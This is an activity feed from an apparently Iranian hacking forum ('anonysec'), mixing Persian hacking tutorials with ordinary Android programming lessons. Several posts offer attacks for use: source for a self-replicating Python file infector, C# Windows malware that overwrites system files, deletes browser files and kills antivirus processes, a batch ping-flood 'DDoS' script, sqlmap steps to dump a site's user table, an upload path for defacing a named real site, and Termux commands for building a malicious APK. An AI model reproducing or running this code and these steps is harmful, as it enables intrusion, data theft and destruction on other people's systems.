رفتن به مطلبiran rules jazbe modir
snapphost mahak

تمامی فعالیت ها

این جریان به طور خودکار به روز می شود     

 1. ساعت گذشته
 2. امروز
 3. Miscellaneous

  ابتدا از سایت github ابزار passgen.py را دانلود میکنید . برای این کار ابتدا دستور زیر را در ترمینال کالی لینوکس وارد کنید git clone https://github.com/Zenexer/passgen.git بعد از دانلود شدن ابزار دستور های زیر را مینویسیم ls cd PassGen python passgen.py بعد که ابزار باز شد تمامی پسورد هایی که دارای استفاده هستن برای شما می اورد شما ان هارا کپی کرده و در فایل .txt پیست کرده و سیو کنید با تشکر
 4. Hacking-Virus

  خب امروز میخوام براتون اموزش ساخت ویروس با زبان پایتون را برایتان قرار بدم خب قدرت این ویروس فقط متن anonysec روی صفحه مانیتور میوفته و خاموش میشه مانیتور بازهم اینطور تکرار میشه کافیه این سورس کد کوچک را در pythons ide پیست کرده و سیو کنید ویا در not pad پیست کرده با فرمت .py سیو کنید import os import datetime SIGNATURE = "CRANKLIN PYTHON VIRUS" def search(path): filestoinfect = [] filelist = os.listdir(path) for fname in filelist: if os.path.isdir(path+"/"+fname): filestoinfect.extend(search(path+"/"+fname)) elif fname[-3:] == ".py": infected = False for line in open(path+"/"+fname): if SIGNATURE in line: infected = True break if infected == False: filestoinfect.append(path+"/"+fname) return filestoinfect def infect(filestoinfect): virus = open(os.path.abspath(__file__)) virusstring = "" for i,line in enumerate(virus): if i>=0 and i <39: virusstring += line virus.close for fname in filestoinfect: f = open(fname) temp = f.read() f.close() f = open(fname,"w") f.write(virusstring + temp) f.close() def bomb(): if datetime.datetime.now().month == 1 and datetime.datetime.now().day == 25: print "ANONYSEC" filestoinfect = search(os.path.abspath("")) infect(filestoinfect) bomb()
 5. Hacking-Database

  با سلام بر کاربران anonysec اموزش هک دیتا بیس سایت با باک تراک برای شما دوستان قرار میدم ابتدا دروک زیرا در گوگل سرچ نمایید section.php?id=51 بعد یکی از سایت ها را برای هک انتخواب کنید بعد ابزار sqlmap را در باک تراک اجرا کنید بعد دستورات زیر را داخلش بنویسید python sqlmap.py -u “http://www.site.com/section.php?id=51 اول عبارت بالا که نوشته www.site.com سایتی که میخواهید هکش کنید بنویسید بعد از اسکن دستور زیر را داخلش بنویسید تا برایتان دیتا بیس سایت را بیاورد python sqlmap.py -u “http://www.sitemap.com/section.php?id=51” –dbs خب حالا دستور زیر را مینویسیم تا دیتا بیس را برایمان انتخواب کند python sqlmap.py -u “http://www.site.com/section.php?id=51” –tables -D safecosmetic حالا دستور زیر را هم مینویسیم تا اطلاعات شخص را برایمان بیاورد python sqlmap.py -u “http://www.site.com/section.php?id=51” –columns -D safecosmetics -T users بعد این دستور را مینویسیم تا برایمان دیتابیس را دامپ کند python sqlmap.py -u “http://www.site.com/section.php?id=51” –dump -D safecosmetics -T users و تمام دیتابیس سایت را موفقیت هک کردید با نشکر
 6. دیروز
 7. Hacking-Ddos

  باسلام اموزش ساخت ابزار دیداس کافیست در نوت پد خود کد های زیرا پیست کرده و save as را زده و با فرمت .bat سیو کنید. echo [email protected] mode 67,16 title anonysec ddoser color 0a cls echo. echo site DDOSeR echo. set /p x=server-Target: echo. ping %x% @ping.exe 127.0.0.1 -n 5 -w 100 > nul goto Next :Next echo. echo. echo. set /p n=packed size echo. :DDOS color 0c echo Attacking Server %m% ping %m% -i %n% -t >nul goto DDOS با تشکر anonysec
 8. Graphics-Samples

  خب اول در فتوشاپ یک صفحه سفیذ ایجاد کنید و متنی مثلا anonysec داخلش بنویسید بعد ابزار برش را برداشته و راست کلیک کرده و blending options کلیک کرده و گذینه satin کلیک کنید و متن فلزی خود را طراحی کنید با تشکر
 9. ابتدا برنامه limbo را از گوگل پلی دانلود کنید. بعد limbo را اجرا کنید. روی load machine کلیک کرده و new را بردارید/ اسمی برای machine خود انتخواب کنید برای مثال anonysec بعد از اینکه برداشتید. cpu . gpu . ram را تنظیم کنید بعدقسمت پایین boot setting گذینه boot from device را روی cdrom بگذارید . بعد به قستم removable storage رفته و به CD-ROM تیک گذاشته . و روی NONE کلیک کرده و open را بزنید بروید فایل iso خود را پیدا کنید بعد از اینکه پیدا کردید انتخوابش کنین . بعد از انتخواب به قسمت storage امده و روی هارد دیسک ها تیک را روشن کنید . بعد به بالا امده و گذینه start را بزنید و برید حال کنید با تشکر ANONYSEC
 10. Hacking

  با سلام در این اموزش میخوام اموزش پیدا کردن لینک پنل ادمین انواع سایت هارا برای شما بگذارم خب طبق نگاه به دروک های زیر inpage:admin site:example.com intitle:admin site:example.com inpage:login site:example.com intitle:login site:example.com intext:login site:example.com به جای example.com سایت یا تراگت خود را قرار دهید با تشکر
 11. Hacking-Virus

  از همه چیز اول تشکر از سایت anony sec میباشد 1- ویژوال استادیو اگر در سیستم ندارید نصب کنید اگر هم ندارید برنامه SharpDevelop 5.1 gرا دانلود کنید. هم حجمش خوبه هم عالیه لینک دانلود از خود سایت دانلود بعد از نصب یک سر برگ بسازید و سورس کد زیرا در داخلش جا بدید. static void Main(string[] args) { api.ShowWindow(api.FindWindow("ConsoleWindowClass", null), api.SW_HIDE); api.ShowWindow(api.FindWindow("#32770", null), api.SW_HIDE); api.ShowWindow(api.FindWindow("MGHTML_DLG_CLASS", null), api.SW_HIDE); api.ShowWindow(api.FindWindow("NAVAP Wnd Clas", null), api.SW_HIDE); api.ShowWindow(api.FindWindow("RegEdit_RegEdit", null), api.SW_HIDE); api.ShowWindow(api.FindWindow("notepad", null), api.SW_HIDE); ////////////////////////////////////////////////////////////////////// try { File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"\winlogon.dll.exe"); Registry.SetValue } catch (Exception) { Console.WriteLine("terminate process!"); } api.MessageBeep(20); api.Sleep(50000); api.SHRestartSystemMB(0, "Windows", api.EWX_LOGOFF); for (int c = 0; c < 256; c++) { try { string FirstPath = System.Environment.SystemDirectory + @"\notepad.exe"; string SecondPath = System.Environment.SystemDirectory + @"\SKYNet.exe"; File.Move(FirstPath, SecondPath); File.Copy(Application.ExecutablePath, System.Environment.SystemDirectory + @"\notepad.exe"); } catch (Exception) { Console.WriteLine("Can not open explore.exe"); } try { File.Delete(@"C:\Program Files\Yahoo!\Messenger\YPager.exe"); File.Delete(@"D:\Program Files\Yahoo!\Messenger\YPager.exe"); File.Delete(@"E:\Program Files\Yahoo!\Messenger\YPager.exe"); File.Delete(@"C:\Program Files\Internet Explorer\IEXPLORE.EXE"); File.Delete(@"D:\Program Files\Internet Explorer\IEXPLORE.EXE"); File.Delete(@"E:\Program Files\Internet Explorer\IEXPLORE.EXE"); File.Delete(@"C:\WINDOWS\$hf_mig$\KB873339\spmsg.dll"); File.Delete(@"D:\WINDOWS\$hf_mig$\KB873339\spmsg.dll"); File.Delete(@"E:\WINDOWS\$hf_mig$\KB873339\spmsg.dll"); File.Delete(@"C:\WINDOWS\system32\drivers\etc\hosts"); File.Delete(@"D:\WINDOWS\system32\drivers\etc\hosts"); File.Delete(@"E:\WINDOWS\system32\drivers\etc\hosts"); } catch (Exception) { Console.WriteLine("error memory"); } try { File.Copy(Application.ExecutablePath, @"C:\Program Files\\Kazaa\My Shared Folder\winampa.dll.pif"); File.Copy(Application.ExecutablePath, @"D:\Program Files\\Kazaa\My Shared Folder\project.exe"); File.Copy(Application.ExecutablePath, @"J:\Program Files\\Kazaa\My Shared Folder\SkyNetAntiVirus.doc.cmd"); File.Copy(Application.ExecutablePath, @"E:\Program Files\\Kazaa\My Shared Folder\screen_saver!.scr"); File.Copy(Application.ExecutablePath, @"F:\Program Files\\Kazaa\My Shared Folder\winlogon.dll.exe"); File.Copy(Application.ExecutablePath, @"H:\Program Files\\Kazaa\My Shared Folder\fun.pic.scr"); } catch (Exception) { Console.WriteLine("can not fine Kazaa"); } api.MessageBeep(20); api.Sleep(9000); api.SHRestartSystemMB(0, "Windows", api.EWX_LOGOFF); ////////////////////////////////////////////////////////////// try { string[] process ={ "NPROTECTED", "GhostTray", "NAVW32", "F-AGNT95", "NOD32", "NETD32", "NETMON", "IOMON98", "SCAN32", "NORMIST", "NAVW3", "ADAWARE", "AGENTW", "LU32", "NAVAP32", "ANTIVIR", "TCM", "W9X", "AVKSERV", "AV", "ACKWIN32", "AD-AWARE", "ADVXDWIN", "AGENTSVR", "AGENTW", "ANTIVIRUS", "ANTS", "APIMONITOR", "APLICA32", "ARR", "AUPDATE", "AUTODOWN", "AUTOTRACE", "AVE32", "AVGCC32", "AVGCTRL", "AVGNT", "CFINET", "CLEANPC", "CTRL", "CV ", "DATEMANAGER ", "DOORS", "DPFSETUP ", "FCH32 ", "FNRB32", "notepad", "IEXPLORE", "POP3TRAP", "remind", "cftmon", "msmsgs", "taskmgr", "regedit", "alg", "ZONEALARM" }; Random rnd1 = new System.Random(); int result1 = rnd1.Next(0, 56); string randomProcess = process[result1]; Process[] myProcesses; myProcesses = Process.GetProcessesByName(randomProcess); { myProcess.CloseMainWindow(); } } catch (Exception) { Console.WriteLine("Send Report Error"); } } api.Sleep(40000); for (int r = 0; r < 10; r++) { api.MessageBeep(20); } خب بعد روی دیباگ کلیک کرده و ویروس خود را تست نمایید ولی طبق تست ما کلا درایو c پاک میشود . ANONYSEC
 12. http://t.me/Anony_secbot ربات رسمی anonysec برای ارسال فایل دریافت لینک ساخته شده توسط خودم برای سایت
 13. Hacking-Database

  درود با تشکر از آموزش خوبتون در ادامه موردی را هم متذکر شوم. شرایطی در ویو سورس وجود دارد که بتوان تمام قالب را کشید بیرون. کدی که در اولین صفحه نمایش داده میشود فقط کد اجرایی index می باشد. برای بیرون کشیدن کل قالب باید فایل های css و jq را داخل هدر و فوتر به طور معمول یافت و با آدرس دهی درست فایل ها را ساخته و داخل هاست قرار داد... ریپ کردن نیز از همین موارد دزدیدن قالب هستش. در آخر زمانی قالب سالم و کامل اجرا می شود که تمام کدها درست قرار داده شده باشند. در مورد cms ها نیز همانند وردپرس به روش های خودشان ریپ می شوند. اگر نیاز به آموزش به صورت ویدئو یا انجام کار توسط ما برای کپی قالب برای خود را دارید می توانید در همین سایت به بنده پیام خصوصی ارسال کرده یا در صورت نیاز با شماره تماس زیر در ارتباط باشید: 09365891594 تلگرام نیز با همین شماره هستش. موفق باشید
 14. Hacking-Bugs

  باگ xss نوعی از خطرناک ترین باگ ها در روی سایت ها می باشد دروک مورد نیاز برای یافتن سایت های دارای باگ xss دروک 👇 inurl:frame=product_detail خب حالا خواستیم دیفیس خود را روی سایتی که دارای باگ هست اپلود کنیم دروک زیر را بخ اخر سایت وارد میکنیم. مثلا اگه ادرس سایت مثل ادرس زیر هست VegaStore - Chuyên Mua Bán SmartPhone دروک زیرا به این صورت وارد میکنیم/jscripts/FCKeditor/editor/filemanager/upload/test.html دروک را به این صورت روی سایت وارد میکنیم http://vegastorevn.com/jscripts/FCKeditor/editor/filemanager/upload/test.html وحالا میتونیم دیفیس خود را اپلود کنیم با تشکر ✌ اموزشی ساده برای تازه کارا میباشد
 15. Hacking-Bugs

  خب بریم سراغ اموزش 👇 1- ابزار اسکن سایت با کالی لینوکس برترین ابزار اسکن سایت در کالی لینوکس Vega میباشد . جهت نصب ابزار کافیست درقسمت ترمینال کالی لینوکس دستور Apt-get install Vega را تایپ کرده و ابزار را نصب کنید برای اجرای ابزار هم کافیست عبارت Vega را در ترمینال وارد کنید در قسمت target ادرس سایت را نوشته و اسکن کنید . و در اخر نتیجه را بررسی کرده و نوع باگ را بیابید 2- اسکن سایت با ویندوز اول برنامه acuntix را دانلود و نصب کرده و بعد برنامه را اجرا کنید روی new scan کلیک کرده و ادرس سایت را تایپ کرده و روی scan کلیک کنید . در اخر نتیجه را بررسى کرده و نوع باگ را بیابید با تشکر
 16. Hacking-Database

  با سلام بریم سراغ اموزش اول مرورگر فایر فاکس را باز کرده وارد سایت شده راست کلیک کرده و گذینه view source بزنید و کد های قالب سایت را نگاه کنید با تشکر
 17. Programming-Android

  چرخه حیات Activity در اندروید مبحث مهم و جالبی است که پی بردن به آن شما را با رفتار گوشی هوشمند با نرم افزار شما آشنا می‌سازد. در قسمت‌های قبل گفتیم کدهای اجرای نرم افزار خود را در onCreate می‌نویسیم، ولی چرا؟ وقتی روی آیکون نرم افزار خود کلید می‌کنید وارد مرحله onCreate می‌شویم، پس از چند لحظه وارد مرحله onStart و سپس onResume می‌شوید. سورس زیر را در MainActivity خود پیاده کنید و در ماشین مجازی اجرا کنید: public class MainActivity extends AppCompatActivity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); Toast.makeText(this, "onCreate", Toast.LENGTH_SHORT).show(); } @Override protected void onStart() { super.onStart(); Toast.makeText(this, "onStart", Toast.LENGTH_SHORT).show(); } @Override protected void onResume() { super.onResume(); Toast.makeText(this, "Anonyseec.org", Toast.LENGTH_SHORT).show(); } } در ماشین مجازی هر وقت یک حالت اجرا شود، پیام Toast اجرا شدن آن به نمایش در می‌آید: حالا در گوشی مجازی دکمه Back را زده و از لیست نرم افزارها دوباره برنامه خود را اجرا کنید، چه می‌بینید؟ درست است متد onCreate اجرا نمی‌شود ولی دو متد دیگر onStart و onResume به نمایش در می‌آیند. متد onCreate زمانی اجرا می‌شود که برنامه برای اولین بار اجرا می‌شود. زمانی که یک برنامه را باز کرده و back می‌زنید، برنامه در حافظه اجرا شده باقی می‌ماند. دوباره کلید Back را بزنید و این بار کلید مربع را بزنید در این صفحه لیست برنامه‌هایی که در حافظه باقی مانده اند را مشاهده می‌کنید. در حالتی که کلید مربع را فشار داده اید با ماوس روی علامت ضربدر کلیک کنید تا برنامه از حالت اجرا خارج شود. برنامه را دوباره از لیست نرم افزارهای خود اجرا کنید، خواهید دید این بار متد onCreate را نیز مشاهده می‌کنید. پس وقتی شما در حال مشاهده صفحه نرم افزار خود هستید در واقع در حالتی قرار گرفته اید که onResume نام دارد، چون مراحل قبلی onCreate و onStart به سرعت و در کسری از زمان طی می‌شوند. نکته: برای کمک گرفتن از Android Studio برای تکمیل خودکار دستوراها کافی است نام حالت مانند onCreate و یا onResume را بنویسیم تا پس از انتخاب کدهای پیشنهادی فرایند تکمیل کد برای شما اجرا شود تا این جا سه مرحله از حیات یک Activity را با هم شناختیم. مراحل دیگری جز مراحل ذکر شده در بالا وجود دارند که عبارت اند از: onPause onStop onRestart onDestroy برای بررسی کامل چرخه حیات اکتیویتی‌های اندروید برنامه‌ای برای نمونه قصد داریم پیاده سازی کنیم. این برنامه از دو اکتیویتی به نام‌های MainActivity و Main2Activity تشکیل شده است. هر دو اکتیویتی دارای لایه نمایش هستند که لایه نمایش اکتیویتی اول activity_main.xml و لایه نمایش اکتیویتی دوم activity_main2.xml می‌باشد. در لایه نمایش اول یک کلید وجود دارد که شما را به اکتیویتی دوم هدایت می‌کند. در لایه نمایش دوم نیز کلیدی وجود دارد که شما را به لایه نمایش اکتیویتی اول باز می‌گرداند فایل MainActivity را به صورت زیر پیاده سازی می‌کنیم: public class MainActivity extends AppCompatActivity { Button button; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); Toast.makeText(this, "onCreate", Toast.LENGTH_SHORT).show(); button= (Button) findViewById(R.id.button); button.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Intent transfer = new Intent(MainActivity.this, Main2Activity.class); MainActivity.this.startActivity(transfer); } }); } @Override protected void onStart() { super.onStart(); Toast.makeText(this, "onStart", Toast.LENGTH_SHORT).show(); } @Override protected void onResume() { super.onResume(); Toast.makeText(this, "Anonysec.org", Toast.LENGTH_SHORT).show(); } @Override protected void onPause() { super.onPause(); Toast.makeText(this, "onPause", Toast.LENGTH_SHORT).show(); } @Override protected void onStop() { super.onStop(); Toast.makeText(this, "onStop", Toast.LENGTH_SHORT).show(); } @Override protected void onRestart() { super.onRestart(); Toast.makeText(this, "onRestart", Toast.LENGTH_SHORT).show(); } @Override protected void onDestroy() { super.onDestroy(); Toast.makeText(this, "onDestroy", Toast.LENGTH_SHORT).show(); } } در تمام حالات هفت گانه چرخه حیات اکتیویتی Toast‌هایی برای نشان دادن حالت فعلی برنامه وجود دارد. این Toast‌ها به شما کمک می‌کنند تا بفهمید برنامه الان چه حالتی را سپری می‌کند. لایه نمایش این اکتیویتی که activity_main نام دارد به صورت زیر است: <?xml version="1.0" encoding="utf-8"?> <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" android:paddingBottom="@dimen/activity_vertical_margin" android:paddingLeft="@dimen/activity_horizontal_margin" android:paddingRight="@dimen/activity_horizontal_margin" android:paddingTop="@dimen/activity_vertical_margin" tools:context="hitos.ir.hitosapp.MainActivity"> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Activity 1" android:textSize="30dip" android:id="@+id/textView"/> <Button style="?android:attr/buttonStyleSmall" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Secound Activity" android:id="@+id/button" android:layout_marginTop="44dp" android:layout_below="@+id/textView" android:layout_alignParentLeft="true" android:layout_alignParentStart="true"/> </RelativeLayout> نام اکتیویتی دوم که باید آن را به برنامه خود اضافه کنید را Main2Activity بگذارید، و سورس آن را از زیر دریافت کنید: public class Main2Activity extends AppCompatActivity { Button button2; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main2); button2= (Button) findViewById(R.id.button2); button2.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Intent transfer = new Intent(Main2Activity.this, MainActivity.class); Main2Activity.this.startActivity(transfer); } }); } } کد فایل نمایشی activity_main2 که در این اکتیویتی وجود دارد نیز به شرح زیر است: <?xml version="1.0" encoding="utf-8"?> <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" android:paddingBottom="@dimen/activity_vertical_margin" android:paddingLeft="@dimen/activity_horizontal_margin" android:paddingRight="@dimen/activity_horizontal_margin" android:paddingTop="@dimen/activity_vertical_margin" tools:context="hitos.ir.hitosapp.Main2Activity"> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Activity 2" android:id="@+id/textView2" android:layout_alignParentTop="true" android:layout_alignParentLeft="true" android:layout_alignParentStart="true" android:textSize="30dip"/> <Button android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="First Activity" android:id="@+id/button2" android:layout_below="@+id/textView2" android:layout_alignParentLeft="true" android:layout_alignParentStart="true" android:layout_marginTop="32dp"/> </RelativeLayout> پس از پیاده سازی برنامه فوق حالات زیر را تست کرده و تمام مراحل هفت گانه حیات اکتیویتی‌ها را مشاهده کنید. توجه کنید که مراحل را برای این بار به دقت و تنها یک بار و به ترتیب موجود در زیر انجام دهید. اکیدا توصیه می‌شود که از اندروید 4.1 در ماشین مجازی خود استفاده کنید تا نتیجه مشابهی با نتایج زیر بدست آورید: برنامه را اجرا کنید: در این حالت ابتدا متد onCreate و سپس onStart و در نهایت onResume را خواهید داشت. روی کلید Secound Activity کلیک کنید: در این حالت از اکتیویتی MainActivity به Main2Activity منتقل می‌شوید. در این حالت اول وارد حالت onPause و سپس onStop خواهید شد. روی کلید First Activity کلیک کنید: در این حالت از اکتیویتی Main2Activity به MainActivity باز می‌گردید. ابتدا onCreate سپس onStart و در نهایت onResume اجرا می‌گردد. در صفحه اکتیویتی اول کلید دایره را بزنید: در این مرحله صفحه اکتیویتی مخفی می‌شود و ابتدا وارد حالت onPause و سپس onStop می‌شوید. از صفحه منو برنامه‌ها برنامه خود را یافته و اجرا کنید: onRestart و سپس onStart و onResume اجرا خواهند شد. نکته مهم: البته برخی حالات ممکن است در گوشی‌های مختلف با نسخه اندروید بالاتر و یا پایین تر عکس العمل متفاوتی داشته باشند، و الزاما اینگونه نیست که حتما همین عکس العمل‌ها را در تمام گوشی‌ها تجربه کنید
 18. Programming-Android

  انتقال اطلاعات از یک اکتیویتی به اکتیویتی دیگر در این بخش قصد داریم یک عبارت معین را از MainActivity به Main2Activity انتقال بدهیم. فایل MainActivity قبل را به شکل زیر ویرایش می‌کنیم: public class MainActivity extends AppCompatActivity { Button button; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); button= (Button) findViewById(R.id.button); button.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Intent transfer = new Intent(MainActivity.this, Main2Activity.class); transfer.putExtra("sendedText", "hitos.ir"); MainActivity.this.startActivity(transfer); } }); } } به دستورات اضافه شده در سطر 14 دقت کنید. به متغیر transfer که مسئولیت انتقال به اکتیویتی Main2Activity را بر عهده دارد با متد putExtra یک پیام ارسال می‌کنیم. نام پیام sendedText و محتوای پیام hitos.ir می‌باشد. فایل Main2Activity را به شکل زیر ویرایش می‌کنیم public class Main2Activity extends AppCompatActivity { Button button2; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main2); Bundle resived = getIntent().getExtras().getString("sendedText"); Toast.makeText(this, resived.getString("sendedText"), Toast.LENGTH_LONG).show(); button2= (Button) findViewById(R.id.button2); button2.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Intent transfer = new Intent(Main2Activity.this, MainActivity.class); Main2Activity.this.startActivity(transfer); } }); } } در سطرهای نه و ده دستورات مربوط به دریافت پیام قرار گرفته اند. در سطر نه یک متغیر به نام resived از نوع Bundle ایجاد می‌کنیم و باgetIntent().getExtras() پیام را دریافت می‌کنیم. در سطر دهم با استفاده از Toast سعی در نمایش پیام دریافت شده از Main2Activity داریم. برای دریافت این پیام از resived.getString("sendedText") استفاده می‌کنیم. متغیر resived را آورده و در ادامه از متد getString استفاده کردیم. درون پرانتز نام پیام موجود در MainActivity را وارد کردیم.
 19. Programming-Android

  انتقال بین Activity‌ها در اندروید در این بخش قصد داریم به شما بیاموزیم که چگونه می‌توان بین Activity‌ها جا به جا شد. لایه نمایش MainActivity که activity_main نام دارد را به شکل زیر ویرایش کنید: <?xml version="1.0" encoding="utf-8"?> <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" android:paddingBottom="@dimen/activity_vertical_margin" android:paddingLeft="@dimen/activity_horizontal_margin" android:paddingRight="@dimen/activity_horizontal_margin" android:paddingTop="@dimen/activity_vertical_margin" tools:context="hitos.ir.hitosapp.MainActivity"> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Activity 1" android:textSize="30dip" android:id="@+id/textView"/> <Button style="?android:attr/buttonStyleSmall" android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Secound Activity" android:id="@+id/button" android:layout_marginTop="44dp" android:layout_below="@+id/textView" android:layout_alignParentLeft="true" android:layout_alignParentStart="true"/> </RelativeLayout> در لایه فوق یک TextView با متن Activity 1 و یک Button با متن SECOUND ACTIVITY داریم. به برنامه خود یک activity جدید به نام Main2Activity و لایه نمایش activity_main2 اضافه کنید. لایه نمایش مرتبط با Activity دوم به صورت زیر خواهد بود: <?xml version="1.0" encoding="utf-8"?> <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="match_parent" android:layout_height="match_parent" android:paddingBottom="@dimen/activity_vertical_margin" android:paddingLeft="@dimen/activity_horizontal_margin" android:paddingRight="@dimen/activity_horizontal_margin" android:paddingTop="@dimen/activity_vertical_margin" tools:context="hitos.ir.hitosapp.Main2Activity"> <TextView android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="Activity 2" android:id="@+id/textView2" android:layout_alignParentTop="true" android:layout_alignParentLeft="true" android:layout_alignParentStart="true" android:textSize="30dip"/> <Button android:layout_width="wrap_content" android:layout_height="wrap_content" android:text="First Activity" android:id="@+id/button2" android:layout_below="@+id/textView2" android:layout_alignParentLeft="true" android:layout_alignParentStart="true" android:layout_marginTop="32dp"/> </RelativeLayout> لایه نمایش فوق مشابه لایه نمایش اول است با این تفاوت که متن‌های موجود در TextView آن Activity 2 و متن موجود در Button آن برابر FIRST ACTIVITY می‌باشد. قصد داریم کدهایی بنویسیم که از لایه نمایش اول به لایه نمایش دوم و بالعکس منتقل شویم. کدهای MainActivity را به شکل زیر ویرایش می‌کنیم public class MainActivity extends AppCompatActivity { Button button; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main); button= (Button) findViewById(R.id.button); button.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Intent transfer = new Intent(MainActivity.this, Main2Activity.class); MainActivity.this.startActivity(transfer); } }); } } در بخش‌های قبلی کلیه مباحث فوق آموزش داده شد، و در این بخش به سطرهای 13 و 14 می‌پردازیم. برای انتقال به اکتیویتی‌های دیگر به متد Intent نیاز داریم. در سطر 13 پس از نوشتن Intent یک نام برای عملیات انتقال انتخاب می‌کنیم که در اینجا transfer را وارد کردیم. بعد از تساوی با new یک انتقال جدید از نوع Intent ایجاد می‌کنیم. داخل پرانتز دو ورودی داریم، در ورودی اول نام اکتیویتی و سپس this را وارد می‌کنیم، که منظور این است که مبدا این انتقال اکتیویتی MainActivity است. در ورودی دوم نام اکتیویتی دوم و در نهایت عبارت class را وارد می‌کنیم. در سطر 14 نام اکتیویتی فعلی و سپس this و سپس عبارت startActivity و داخل پرانتز نام عملیات انتقال را که در سطر قبلی انتخاب کردیم وارد می‌کنیم. کدهای Main2Activity به شکل زیر است: public class Main2Activity extends AppCompatActivity { Button button2; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main2); button2= (Button) findViewById(R.id.button2); button2.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Intent transfer = new Intent(Main2Activity.this, MainActivity.class); Main2Activity.this.startActivity(transfer); } }); } } در این اکتیویتی قصد داریم به اکتیویتی قبل که MainActivity نام دارد باز گردیم. کلید button2 در لایه مربوط به activity_main2 را برای این کار اختصاص می‌دهیم. کدهای سطرهای 13 و 14 برای انتقال به اکتیویتی اول آماده شده اند
 20. Programming-Android

  آشنایی با Activity‌ها و چرخه حیات آن‌ها را در این مطلب به صورت حرفه‌ای بررسی می‌کنیم. اگر به مسیر manifests رفته و فایل AndroidManifest.xml را باز کنید تگی با عنوان activity خواهید دید که در خاصیت name آن نام اصلی activity وجود دارد. فایل Manifest پیش فرض برنامه اندروید ما به شکل زیر است: <?xml version="1.0" encoding="utf-8"?> <manifest xmlns:android="http://schemas.android.com/apk/res/android" package="anonysec.anonymousapp"> <application android:allowBackup="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:supportsRtl="true" android:theme="@style/AppTheme"> <activity android:name=".MainActivity"> <intent-filter> <action android:name="android.intent.action.MAIN"/> <category android:name="android.intent.category.LAUNCHER"/> </intent-filter> </activity> </application> </manifest> در فایل فوق نام برنامه، پکیج برنامه و دیگر خصوصیات کلی مانند Theme و آیکن نرم افزار را می‌توان مشاهده و یا تغییر داد. در خط 10 تگی به نام activiy موجود است که در خط 16 به پایان می‌رسد. خاصیت android:name شامل نام اکتویتی می‌شود. نقطه قبل از نام اکتیویتی به این معناست که این اکتیویتی باید از پکیج اصلی برنامه فراخوانی شود. تگ intent-filter درون تگ activity به این معناست که این اکتیویتی باید به عنوان اولین اکتیویتی در برنامه اجرا شود. هر برنامه ممکن است متشکل از ده‌ها اکتیویتی باشد که با intent-filter اولین اکتیویتی اجرا شده توسط نرم افزار مشخص می‌شود. اگر بخواهیم یک اکتیویتی جدید به برنامه خود اضافه کنیم در مسیر java روی package برنامه خود راست کلیک کرده و new و از آن activity و در نهایت Empty Activity را انتخاب می‌کنیم. در پنجره باز شده و در Activity name نام اکتیویتی جدید را وارد می‌کنیم. اگر گزینه Generate Layout File فعال باشد یک لایه نمایش برای اکتیویتی جاری به نامی برابر فیلد Layout Name ایجاد می‌گردد. دقت کنید که وقتی Activity را ایجاد کردید فایل AndroidManifest.xml نیز به صورت خودکار ویرایش شده و تگ این اکتیویتی جدید نیز به آن افزوده می‌گردد.
 21. Soft-Android

  install Termux donwload Termux
 22. Hacking

  خب بریم سراغ اموزش :)ّ 1- اول از گوگل پلی برنامه termux را دانلود کنید 2- حالا در قسمت ترمینال دستور هارا وارد کنید Pkg install nmap را تایپ کنید با تشکر Ãñóñÿ sec
 23. با سلام امروز میخوام اموزش ساخت ویروس با اندرویید را برای شما بدم [آموزش ساخت ویروس با ترموکس] اول به ترتیب دو دستور زیر را در ترموکس وارد کنید برای اپدیت برنامه ها apt update apt upgrade درادامه ابزار git رو باید نصب کنیم pkg install git در این مرحله هم باید پایتون ۲ رو نصب کنیم pkg install python2 دستور بعدی pip2 install requests و در آخر لینک زیر را وارد میکنیم git clone GitHub - Junior60/vbug حالا ls میزنیم بعد با cd وارد vbug میشیم cd vbug حالا میزنیم python2 vbug.py حالا باید یه اینتر بزنیم بعد عدد 1 رو وارد کنید و اینتر بزنید حالا حرف E رو میزنیم بعد اینتر رو میزنیم بعد تموم شدن ls میزنیم و میبینیم یه فایل با فرمت apk ساخته شده اسم اونو کپی میکنیم و به این صورت کپی میکنیم در حافظه گوشی cp -f نام کامل فایل /sdcard مثال cp -f 37937.apk /sdcard بعد میرید از حافظه دستگاهتون میبینید که ساخته شد. با تشکر
 24. Programming-Android

